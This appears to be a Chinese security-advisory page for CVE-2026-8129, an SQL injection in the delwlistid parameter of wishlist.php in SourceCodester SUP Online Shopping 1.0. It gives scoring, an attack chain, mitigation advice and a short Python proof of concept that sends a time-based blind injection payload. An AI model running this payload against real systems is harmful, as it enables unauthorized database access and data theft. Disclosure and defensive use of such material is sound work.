IPBUF安全漏洞报告
English
CVE-2026-8129 CVSS 7.3 高危

CVE-2026-8129 SourceCodester购物系统SQL注入漏洞

披露日期: 2026-05-08
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-8129
漏洞类型
SQL注入
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
SourceCodester SUP Online Shopping

相关标签

SQL注入SourceCodesterWeb安全CVE-2026-8129

漏洞概述

SourceCodester SUP Online Shopping 1.0版本中存在严重的SQL注入漏洞。该漏洞源于wishlist.php文件在处理delwlistid参数时未进行充分的输入验证,导致攻击者能够构造恶意SQL语句。由于无需用户交互和身份认证,远程攻击者可利用此漏洞窃取敏感数据、修改数据库内容或破坏系统可用性,对电商平台造成实质性安全风险。

技术细节

漏洞位于SourceCodester SUP Online Shopping 1.0的wishlist.php文件中。程序在接收用户请求时,直接将delwlistid参数的值拼接到SQL查询语句中,未使用预编译语句或进行有效的字符转义。这种不安全的直接拼接方式允许攻击者通过注入单引号等SQL元字符改变查询逻辑。攻击者可以利用基于布尔或时间的盲注技术提取数据库结构、用户凭证等敏感信息,或者通过联合查询直接获取数据。CVSS 3.1评分为7.3,表明攻击复杂度低且无需权限即可被远程利用。

攻击链分析

STEP 1
侦察
攻击者识别目标运行SourceCodester SUP Online Shopping 1.0系统。
STEP 2
漏洞探测
定位到wishlist.php端点,并发现delwlistid参数未经过滤。
STEP 3
漏洞利用
攻击者发送包含恶意SQL payload的HTTP请求,操纵delwlistid参数。
STEP 4
执行与影响
后端数据库执行恶意SQL语句,导致数据泄露、篡改或服务拒绝。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (replace with actual target) target_url = "http://target-host/wishlist.php" # Malicious payload for the 'delwlistid' parameter # Example: Testing for time-based blind injection payload = "1' AND (SELECT SLEEP(5))-- -" params = { "delwlistid": payload } try: response = requests.get(target_url, params=params, timeout=10) # Analyze response time or content to confirm vulnerability print(f"Status Code: {response.status_code}") print("Response received. Check if response time indicates injection.") except Exception as e: print(f"Error: {e}")

影响范围

SourceCodester SUP Online Shopping 1.0

防御指南

临时缓解措施
在官方发布安全补丁之前,建议开发者修改wishlist.php代码,对delwlistid参数强制进行整数类型转换或使用正则表达式过滤。管理员应在Web服务器或WAF层面配置规则,拦截针对该参数的异常请求。同时,应定期检查数据库日志以确认是否已被入侵。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。